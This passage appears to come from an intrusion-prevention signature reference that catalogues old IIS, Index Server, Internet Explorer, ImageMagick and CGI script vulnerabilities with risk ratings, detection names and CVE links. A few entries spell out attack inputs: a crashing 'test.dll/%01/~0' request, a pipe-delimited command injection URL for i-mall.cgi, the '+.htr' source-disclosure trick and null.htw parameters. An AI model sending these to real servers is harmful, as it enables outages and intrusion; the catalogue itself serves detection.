https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0079
BID-4485
http://www.securityfocus.com/bid/4485
MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018
Back to top

HTTP-IIS-Asp-Server-Side-Include-Function-Vulnerability

About this vulnerability: Windows IIS ASP server side include function vulnerabilitys
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: IIS 4.0, 5.0 and 5.1 do not handle the filenames of ASP include files correctly. Remote and local attackers can execute arbitrary files by forcing the server to execute crafted ASP code that tries to include files with long names.
Situation: HTTP_CS-IIS-Asp-Server-Side-Include-Function-Vulnerability
References:
CVE-2002-0149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0149
BID-4478
http://www.securityfocus.com/bid/4478
OSVDB-3320
http://www.osvdb.org/3320
MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018
Back to top

HTTP-IIS-Bat-Remote-Command-Execution

About this vulnerability: Remote command execution in Microsoft IIS 1.0
Risk: High
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 1.0
Type: Metacharacter Injection
Description: A malicious user can execute arbitrary commands on the target host with the Web server process privileges by sending a specially crafted request.
References:
CVE-1999-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0233
BID-2023
http://www.securityfocus.com/bid/2023
Back to top

HTTP-IIS-Bdir-Htr-Information-Disclosure

About this vulnerability: IIS bdir.htr displays directory listings
Risk: Low
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: When IIS 3.0 is upgraded to 4.0, some scripts are left into the /scripts/iisadmin/ directory. The bdir.htr script allows unauthenticated remote attackers to view directory listings from the server. The vulnerability can be exploited to gain information about the server's directory structure.
References:
BID-2280
http://www.securityfocus.com/bid/2280
Back to top

HTTP-IIS-BOF-MS99-019

About this vulnerability: IIS Buffer Overflow (MS99-019)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 4.0
Type: Buffer Overflow
Description: A buffer overflow vulnerability in old IIS 4 WWW servers allows remote compromise if successfully exploited. The vulnerability is located in the handling of .htr, .idc, and .stm extensions.
Situation: HTTP_CSU-IIS-Htr-Buffer-Overflow
References:
CVE-1999-0874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0874
BID-307
http://www.securityfocus.com/bid/307
MS99-019
http://technet.microsoft.com/security/bulletin/MS99-019
Back to top

HTTP-IIS-File-Fragment-Disclosure

About this vulnerability: File Disclosure vulnerability
Risk: Moderate
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: A maliciously crafted URL could cause IIS to use .htr ISAPI extensions for processing requests of other file types. This may lead to file content disclosure.
Situation: HTTP_CSU-IIS-Htr-File-Fragment-Disclosure
References:
BID-2313
http://www.securityfocus.com/bid/2313
MS01-004
http://technet.microsoft.com/security/bulletin/MS01-004
Back to top

HTTP-IIS-File-Request-Parsing-Vulnerability

About this vulnerability: IIS File Request Parsing Vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Windows
Software: IIS
Type: Directory Traversal
Description: IIS allows the passing of additional commands to requests to valid executable files. This vulnerability allows the attacker to execute commands under the IUSR_machinename context as long as access to a valid executable is available.
References:
CVE-2000-0886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886
BID-1912
http://www.securityfocus.com/bid/1912
MS00-086
http://technet.microsoft.com/security/bulletin/MS00-086
Back to top

HTTP-IIS-Form_JScript-Cross-Site-Scripting

About this vulnerability: Form_JScript.asp cross-site scripting vulnerability
Risk: Moderate
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Cross-site Scripting
Description: A Microsoft IIS sample script /iissamples/sdk/asp/interaction/Form_JScript.asp contains a security vulnerability that allows a remote cross site scripting attack.
Situation: HTTP_CSU-IIS-FormJScript-Access
References:
OSVDB-470
http://www.osvdb.org/470
Back to top

HTTP-IIS-Hit-Highlighting-Authentication-Bypass

About this vulnerability: IIS Hit-Highlighting authentication bypass vulnerability allows file disclosure
Risk: Moderate
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Input Validation
Description: A vulnerability in Microsoft IIS 'Hit-highlighting' functionality has authentication bypass vulnerability that allows remote attackers to gain access to potentially sensitive information.
Situation: HTTP_CRL-IIS-WebHitsfile-Access
References:
CVE-2007-2815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2815
BID-24105
http://www.securityfocus.com/bid/24105
OSVDB-41091
http://www.osvdb.org/41091
Back to top

HTTP-IIS-HTMLEncode-BOF-MS08-006

About this vulnerability: IIS HTMLEncode buffer Overflow
Risk: High
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in HTMLEncode Method. The flaw can be exploited through malicious input to ASP pages that use the vulnerable method. A successful exploit of this vulnerability could let remote attackers execute arbitrary code in the context of the Worker Process Identity,
Situation: HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-1
HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-2
References:
CVE-2008-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0075
BID-27676
http://www.securityfocus.com/bid/27676
MS08-006
http://technet.microsoft.com/security/bulletin/MS08-006
Back to top

HTTP-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability

About this vulnerability: Buffer overflow in Microsoft IIS 4.0/5.0.
Risk: Critical
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Buffer Overflow
Description: A buffer overflow condition in ISAPI HTR extension, related to checked encoding transfer mechanism, enables attacker to execute arbitrary instructions on the server or cause a denial of service.
Situation: HTTP_CSH-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability
References:
CVE-2002-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0364
BID-4855
http://www.securityfocus.com/bid/4855
MS02-028
http://technet.microsoft.com/security/bulletin/MS02-028
Back to top

HTTP-IIS-Htr-Code-Fragment-Disclosure

About this vulnerability: Source code disclosure in Microsoft IIS 4.0/5.0.
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1640-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Metacharacter Injection
Description: Certain versions of Microsoft IIS can be tricked into disclosing the source code of Active Server Pages by appending a "+.htr" toa request of a known script. This information can be potentially used to gain information needed for system compromise.
Situation: HTTP_CSU-IIS-Htr-File-Fragment-Disclosure
References:
CVE-2000-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0630
BID-1488
http://www.securityfocus.com/bid/1488
MS00-044
http://technet.microsoft.com/security/bulletin/MS00-044
Back to top

HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure

About this vulnerability: Path disclosure in Microsoft IIS via IDQ, IDA or HTX files
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Insecure Configuration
Description: IIS Server error message discloses the document root path if the user requests an .idq, .ida or .htx suffixed file from a network share.
Situation: HTTP_IIS-IDQ-IDA-HTX-Access
HTTP_IIS-IDQ-IDA-HTX-Access-Unsuccess
File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access-Unsuccess
File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access
References:
CVE-2000-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0071
BID-1065
http://www.securityfocus.com/bid/1065
Back to top

HTTP-IIS-Iissample-Discovery

About this vulnerability: Information Disclosure
Risk: High
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: A disclosure vulnerability in IIS.
Situation: HTTP_CSU-IIS-Iissamples-Disclosure
References:
CVE-2000-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0098
BID-968
http://www.securityfocus.com/bid/968
MS00-006
http://technet.microsoft.com/security/bulletin/MS00-006
Back to top

HTTP-IIS-Index-Server-Path-Disclosure-Vulnerability

About this vulnerability: IIS Index Server Path Disclosure Vulnerability
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: The Index Server contains a vulnerability which could allow the attacker to gain information about the directory structure.
Situation: HTTP_CSU-IIS-Index-Server-Path-Disclosure-Vulnerability
References:
CVE-1999-1397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1397
BID-476
http://www.securityfocus.com/bid/476
Back to top

HTTP-IIS-Isapi-Dot-Printer-BOF

About this vulnerability: IIS Isapi Dot Printer BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1607-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: Unchecked input to msw3prt.dll can be used to cause a buffer overflow in the IIS. This can lead to a complete system compromise.
Situation: HTTP_CS-IIS-Isapi-Dot-Printer-BOF
References:
CVE-2001-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0241
BID-2674
http://www.securityfocus.com/bid/2674
OSVDB-3323
http://www.osvdb.org/3323
MS01-023
http://technet.microsoft.com/security/bulletin/MS01-023
Back to top

HTTP-IIS-Isapi-Filter-Denial-Of-Service

About this vulnerability: W3svc.dll IIS Isapi filter long URL DoS
Risk: Moderate
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: The Internet Information Server IIS ISAPI filter for Frontpage extensions and ASP.NET does not properly handle error conditions triggered by a very long URL. This may lead to a denial of service condition where the web services become unavailable.
References:
CVE-2002-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0072
BID-4479
http://www.securityfocus.com/bid/4479
OSVDB-3326
http://www.osvdb.org/3326
MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018
Back to top

HTTP-IIS-Isapi-Global-Asa-Configuration-Vulnerability

About this vulnerability: IIS Isapi Global Asa Configuration Vulnerability
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Configuration Error
Description: Global.asa is an ISAPI configuration file that may contain user names, passwords and sensible IIS configuration information. This file may be publicly accessible due to a configuration error.
Situation: HTTP_CSU-IIS-Global-Asa-Access
Back to top

HTTP-IIS-Isapi-Htr-Buffer-Overflow

About this vulnerability: Isapi Htr Buffer Overflow
Risk: High
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: A buffer overflow in processing Isapi .htr extensions allows remote code execution
Situation: HTTP_CRL-IIS-Isapi-Htr-BOF
References:
CVE-2002-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0071
BID-4474
http://www.securityfocus.com/bid/4474
OSVDB-3325
http://www.osvdb.org/3325
MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018
Back to top

HTTP-IIS-ISM-DLL-Administration-Vulnerability

About this vulnerability: ism.dll administration vulnerability in IIS4
Risk: Moderate
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: When IIS 2 or IIS 3 is upgraded to IIS 4, the ism.dll library is left in the /scripts/iisadmin/ directory. A remote attacker can call this DLL in an HTTP request to gain access to sensitive information on the server.
Situation: HTTP_CSU-IIS-ISM-DLL-Access
References:
CVE-1999-1538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1538
BID-189
http://www.securityfocus.com/bid/189
Back to top

HTTP-IIS-Malformed-Url-Denial-Of-Service

About this vulnerability: IIS malformed URL DoS
Risk: Moderate
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: Microsoft IIS suffers from a vulnerability in the handling of malformed URLs. If a dynamically linked library (DLL) resource is requested multiple times via a crafted request, the server may shut down. A remote attacker can trigger the vulnerability by sending a request with the following format: GET /test/test.dll/%01/~0, where the last character may be any digit, and the previous directory name must contain a character from a certain range. A successful exploit shuts down the server, resulting in a denial of service situation.
Situation: HTTP_CSU-Microsoft-IIS-Malformed-Url
References:
CVE-2005-4360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4360
BID-15921
http://www.securityfocus.com/bid/15921
OSVDB-21805
http://www.osvdb.org/21805
MS07-041
http://technet.microsoft.com/security/bulletin/MS07-041
Back to top

HTTP-IIS-Ntdll-WebDAV-BOF

About this vulnerability: IIS ntdll.dll buffer overflow exploitable via WebDAV
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000; Windows XP
Software: IIS 5.0
Type: Buffer Overflow
Description: Buffer overflow vulnerability exists in the ntdll.dll library. It can be exploited with a carefully crafted WebDAV request. A successful exploit gives the attacker a remote access.
Situation: HTTP_CS-IIS-Ntdll-WebDAV-BOF
References:
CVE-2003-0109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0109
BID-7116
http://www.securityfocus.com/bid/7116
MS03-007
http://technet.microsoft.com/security/bulletin/MS03-007
Back to top

HTTP-IIS-ServerVariables-JScript-Path-Disclosure-Vulnerability

About this vulnerability: Path disclosure vulnerability reveals IIS installation information
Risk: Low
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Insecure Configuration
Description: A vulnerability in ServerVariables_Jscript.asp script allows remote attacker to gain information of the IIS server that may be lead to further attacks possibly compromising the server.
Situation: HTTP_CSU-IIS-ServerVariablesJScript-Path-Disclosure
References:
OSVDB-471
http://www.osvdb.org/471
Back to top

HTTP-IIS-Unicode-Directory-Traversal-1

About this vulnerability: IIS Unicode Directory Traversal 1
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Windows
Software: IIS
Type: Directory Traversal
Description: Microsoft IIS suffers from a directory traversal vulnerability which when encoding the / and \ in extended unicode. This allows the attacker to view any known file on the system with the IUSR_machinename privileges.
Situation: HTTP_CSU-Cmd-Exe-System-Compromise
References:
CVE-2000-0884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884
BID-1806
http://www.securityfocus.com/bid/1806
OSVDB-436
http://www.osvdb.org/436
MS00-078
http://technet.microsoft.com/security/bulletin/MS00-078
Back to top

HTTP-IIS-WebDAV-MS01-016-DOS

About this vulnerability: Denial of Service in IIS
Risk: High
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: A Denial of service vulnerability in IIS 5 WebDAV.
Situation: HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-016
References:
CVE-2001-0151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0151
BID-2453
http://www.securityfocus.com/bid/2453
MS01-016
http://technet.microsoft.com/security/bulletin/MS01-016
Back to top

HTTP-IIS-WebDAV-MS01-016-Search-DOS

About this vulnerability: Denial of Service in IIS
Risk: High
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: A Denial of service vulnerability in IIS 5 WebDAV.
Situation: HTTP_CS-Microsoft-IIS-WebDAV-Search-DOS-MS01-016
References:
CVE-2001-0151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0151
BID-2453
http://www.securityfocus.com/bid/2453
MS01-016
http://technet.microsoft.com/security/bulletin/MS01-016
Back to top

HTTP-IIS-WebDAV-MS01-044-DOS

About this vulnerability: Denial of Service in IIS
Risk: High
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: A Denial of service vulnerability in IIS 5 WebDAV.
Situation: HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-044
References:
CVE-2001-0508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0508
BID-3194
http://www.securityfocus.com/bid/3194
OSVDB-5633
http://www.osvdb.org/5633
OSVDB-5606
http://www.osvdb.org/5606
MS01-044
http://technet.microsoft.com/security/bulletin/MS01-044
Back to top

HTTP-Imagefolio-Cgi-Cross-Site

About this vulnerability: Cross-site scripting vulnerability in ImageFolio
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: BizDesigns ImageFolio
Type: Malfunction
Description: BizDesigns' ImageFolio has an input-validation vulnerability that allows cross-site scripting. Remote attackers can create URLs that contain arbitrary scripting code, which will be executed by legimate users' browsers. This allows attackers to access target user's cookies and recently-submitted data.
References:
CVE-2002-1334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1334
BID-6265
http://www.securityfocus.com/bid/6265
BID-6265
http://www.securityfocus.com/bid/6265
Back to top

HTTP-Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in ImageMagick SGI decoder component
Risk: Moderate
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of a malicious SGI file containing a crafted BPC field in ImageMagick SGI decoder component. The vulnerability can be exploited by persuading a target user to download a malicious SGI file and open it with the vulnerable product. This causes a DoS or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
File-Binary_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
Back to top

HTTP-Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in ImageMagick SGI decoder component
Risk: Moderate
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of a malicious SGI file containing a crafted ZSIZE field in ImageMagick SGI decoder component. The vulnerability can be exploited by persuading a target user to download a malicious SGI file and open it with the vulnerable product. This causes a DoS or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
File-Binary_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
References:
CVE-2006-4144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4144
BID-19507
http://www.securityfocus.com/bid/19507
OSVDB-27951
http://www.osvdb.org/27951
Back to top

HTTP-Imall-Commerce-Script-System-Compromise

About this vulnerability: I-Mall Commerce allows arbitrary commands execution with URLs
Risk: High
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1602-5242
Platform: Generic
Software: I-Mall Commerce
Type: Malfunction
Description: I-Mall Commerce's i-mall.cgi allows arbitrary commands to be executed with the webserver's uid. Arbitrary shell commands can be sent in the URL, separated with pipe characters (i.e., /i-mall/i-mall.cgi?p=|command|).
References:
BID-10626
http://www.securityfocus.com/bid/10626
Back to top

HTTP-Index-Server-Source-Code-Disclosure

About this vulnerability: Index Server can be exploited to reveal script source code
Risk: Low
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Index Server
Type: Malfunction
Description: Microsoft Index Server can be exploited to reveal the unprocessed source code of scripts. When a request is sent to null.htw with the wanted file name appended with '%20' in the CiWebHitsFile argument, CiHiliteType set to Full and CRestrictions to none, the script source is returned. The exploit can be used on any machine with a vulnerable Index Server installed.
Situation: HTTP_CSU-Index-Server-Source-Code-Disclosure
References:
CVE-2000-0302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0302
BID-1084
http://www.securityfocus.com/bid/1084
OSVDB-271
http://www.osvdb.org/271
MS00-006
http://technet.microsoft.com/security/bulletin/MS00-006
Back to top

HTTP-Info2www-Cgi-System-Compromise

About this vulnerability: Command execution vulnerability in the info2www script
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Roar Smith info2www
Type: Malfunction
Description: Info2www, a script used to convert GNU Info Nodes into HTML, allows remote attackers to execute arbitrary commands on the web server. The vulnerability can be exploited by sending a suitable parameter to info2www.
References:
CVE-1999-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0266
BID-1995
http://www.securityfocus.com/bid/1995
Back to top

HTTP-Infornautics-Getdoc-Cgi-File-Disclosure

About this vulnerability: File disclosure vulnerability in Infornautics getdoc.cgi
Risk: Low
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Infonautics getdoc.cgi
Type: Malfunction
Description: Infonautic's applications use getdoc.cgi to view/purchase documents. Remote users can remove a parameter from the request to getdoc.cgi to bypass the payment phase, allowing users to read arbitrary documents without paying for them.
References:
CVE-2000-0288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0288
Back to top

HTTP-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a heap memory corruption vulnerability in Internet Explorer. By persuading a target user to visit a malicious web site, a remote attacker can cause a DoS or execute non-privileged arbitrary code on the target host.
Situation: HTTP_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
File-Text_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
References:
CVE-2006-1303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1303
BID-18328
http://www.securityfocus.com/bid/18328
OSVDB-26442
http://www.osvdb.org/26442
MS06-021
http://technet.microsoft.com/security/bulletin/MS06-021
Back to top

HTTP-Internet-Explorer-Com-Object-System-Compromise

About this vulnerability: Microsoft Internet Explorer does not correctly handle CLSIDs that refer to COM objects that are not ActiveX components
Risk: High
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: Microsoft Internet Explorer does not correctly handle references to CLSIDs that reference certain COM objects that are not ActiveX controls. The vulnerability can be triggered by viewing a malicious HTML page with Internet Explorer. A successful exploit allows arbitrary code execution on the victim's computer.
Situation: HTTP_Internet-Explorer-Com-Object-System-Compromise
File-Text_Internet-Explorer-Com-Object-System-Compromise
References:
CVE-2005-2087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2087
BID-14087
http://www.securityfocus.com/bid/14087
OSVDB-17680
http://www.osvdb.org/17680
MS05-037
http://technet.microsoft.com/security/bulletin/MS05-037
Back to top

HTTP-Internet-Explorer-Compressed-Content-Url-Buffer-Overflow

About this vulnerability: Internet Explorer compressed content URL buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Buffer Overflow
Description: When it is installed on Windows 2000 or Windows XP SP1 systems which have the update "Microsoft Security Bulletin MS06-042", Microsoft Internet Explorer with Service Pack 1 is vulnerable to a buffer overflow. If an URL of over 260 bytes is followed on a vulnerable system and the server replies with a compressed HTTP reply, a buffer overflow occurs. This allows remote attackers to execute arbitrary code by enticing users to follow a crafted link.
References:
CVE-2006-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3869
BID-19667
http://www.securityfocus.com/bid/19667
OSVDB-28132
http://www.osvdb.org/28132
Back to top

HTTP-Internet-Explorer-Content-Type-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of the Content-Type header in Internet Explorer
Risk: Low
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of the Content-Type header in Internet Explorer that can be exploited to cause a denial of service condition.
Situation: HTTP_SHS-Internet-Explorer-Content-Type-Buffer-Overflow
References:
CVE-2006-5162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5162
BID-19092
http://www.securityfocus.com/bid/19092
OSVDB-29129
http://www.osvdb.org/29129
Back to top

HTTP-Internet-Explorer-CreateTextRange-Vulnerability

About this vulnerability: Internet Explorer createTextRange vulnerability
Risk: High
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Malfunction
Description: Microsoft Internet Explorer has a vulnerability in the handling of the createTextRange method. According to documentation, the checkbox, image and radio buttons of an INPUT element do not have the createTextRange method. However, if the method is used by an HTML page, Internet Explorer erroneously attempts to call the method. This may allow arbitrary remote code execution with the current user's privileges via a specially crafted HTML page.
Situation: HTTP_Internet-Explorer-CreateTextRange-Vulnerability
HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-3
HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-2
File-Text_Internet-Explorer-CreateTextRange-Vulnerability
File-Text_Internet-Explorer-CreateTextRange-Vulnerability-2
File-Text_Internet-Explorer-CreateTextRange-Vulnerability-3
References:
CVE-2006-1359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359
BID-17196
http://www.securityfocus.com/bid/17196
OSVDB-24050
http://www.osvdb.org/24050
MS06-013
http://technet.microsoft.com/security/bulletin/MS06-013
Back to top

HTTP-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.
Situation: HTTP_SS-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
File-Text_Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
References:
CVE-2006-4777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4777
BID-19738
http://www.securityfocus.com/bid/19738
OSVDB-28842
http://www.osvdb.org/28842
MS06-067
http://technet.microsoft.com/security/bulletin/MS06-067
Back to top

HTTP-Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in the handling of a reference to a certain COM object that is not an ActiveX component in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
File-Text_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
References:
CVE-2006-3638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3638
BID-19340
http://www.securityfocus.com/bid/19340
OSVDB-27852
http://www.osvdb.org/27852
MS06-042
http://technet.microsoft.com/security/bulletin/MS06-042
Back to top

HTTP-Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability

About this vulnerability: Internet Explorer MSOE.dll, CHTSKDIC.dll and IMSKDIC.dll object instantiation vulnerability
Risk: Moderate
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Internet Explorer suffers from a vulnerability where trying to instantiate msoe.dll, chtskdic.dll or imskdic.dll as an ActiveX control may corrupt system memory causing a denial of service or possibly executing arbitrary code.
Situation: HTTP_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
File-Text_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
References:
CVE-2006-4193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4193
BID-19521
http://www.securityfocus.com/bid/19521
BID-19529
http://www.securityfocus.com/bid/19529
BID-19530
http://www.securityfocus.com/bid/19530
OSVDB-29345
http://www.osvdb.org/29345
OSVDB-29346
http://www.osvdb.org/29346
OSVDB-29347
http://www.osvdb.org/29347
Back to top

HTTP-Internet-Explorer-Multiple-Com-Objects-System-Compromise

About this vulnerability: Incorrect handling of CLSIDs that refer to non-ActiveX component COM objects
Risk: High
First detected in: sgpkg-ips-34-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Buffer Overflow
